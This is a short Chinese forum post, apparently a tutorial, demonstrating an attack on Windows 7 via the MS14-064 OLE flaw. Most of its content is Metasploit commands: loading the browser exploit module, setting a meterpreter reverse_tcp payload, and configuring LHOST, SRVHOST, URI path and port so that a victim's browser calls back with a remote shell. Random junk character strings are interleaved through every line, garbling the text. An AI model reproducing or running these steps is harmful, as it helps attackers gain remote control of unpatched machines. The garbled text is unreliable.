找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1586|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

5 |( o7 e5 ]7 `7 N- E 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 - j) W# m: r+ W* g( E

2 t5 [0 i* O; a2 p8 x- }1 K; r

5 C5 b0 y u! o/ W& C 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 5 V$ `6 V1 O7 v2 O

) ?4 ^# c8 A! I0 w2 u( p4 |/ w

v5 ~3 [6 k/ p+ u 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp : ~ w7 I2 E# V- V/ ]

) m) k/ U; A6 s1 r: h3 v' ^ k

: U) N* h1 M [5 {% ~- b! o             set AllowPowershellPrompt true! w/ a; r! k. ?" c4 M9 H8 j e% q5 A

( G) F5 i; o) p# m

2 j: v, i) ]* f! A4 `, S) c             Set LHOST 192.168.0.109/ o/ s5 V* ^. d! N8 y

* B3 m$ Z* u+ p! N# M x/ c9 T

7 q, `) @5 h/ s T" O( N             set SRVHOST 192.168.0.109$ O2 j5 F9 [4 \- Y% y

& f( O6 v4 ~ b/ C" G) E

" [0 E { x; E' z! H8 b2 z6 B             Set uripath share! D) P: R5 x4 i7 h7 D5 H

@, ^) I N% x/ k b" G$ x

: z4 P- K; G" r: {7 p9 D0 E+ v             Set srvport 80 6 X/ A9 e1 J5 u. k( p

' u$ r) h( |8 L1 W2 Y2 E) P

% q* b' W0 C; G0 X9 P3 b7 ]  ! v5 B5 w3 l# K G5 h

0 \ q; R4 m" o2 p9 _

4 b3 s' t9 u& B+ }   # w2 E, B- O: D5 k& Q1 H

' ~, V. h% F2 H+ ^1 x

" U6 L2 k6 o8 U& {' t: k6 Q  : L0 c& a: {5 b5 X

# m/ m8 a6 W* Q5 n% |& I" Z9 v+ q

5 I3 {6 _2 G/ z7 \# P  6 G- O. ?; ~+ d5 V$ \

% i' ^/ M1 q% U x6 f! j$ J

' r( ~ P ], z% S7 s& ]( ^  5 h9 i+ g0 ]2 j) s9 X

0 z! Z% p: ^/ |" K6 ^' \

# q; b1 `" d6 J- l0 Y% v8 t: Y9 j 下面我们来访问本地地址如图:9 U, U9 U8 }+ G/ j0 g' v" i" `# |8 x

) B2 g, y/ @5 l; x

2 @$ x0 W! ]2 `: e3 n   * x: b' r' f. ^$ `8 [

+ {7 Q& c- ^7 U6 C/ f3 {$ N# {

, \# Q3 S8 T ~4 W   ( o+ B3 j# y+ X% x/ A8 F

1 i% ~- W6 E$ n' `' R

2 J y9 I% r+ k% C 2 {* B6 ?& S6 S; R

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表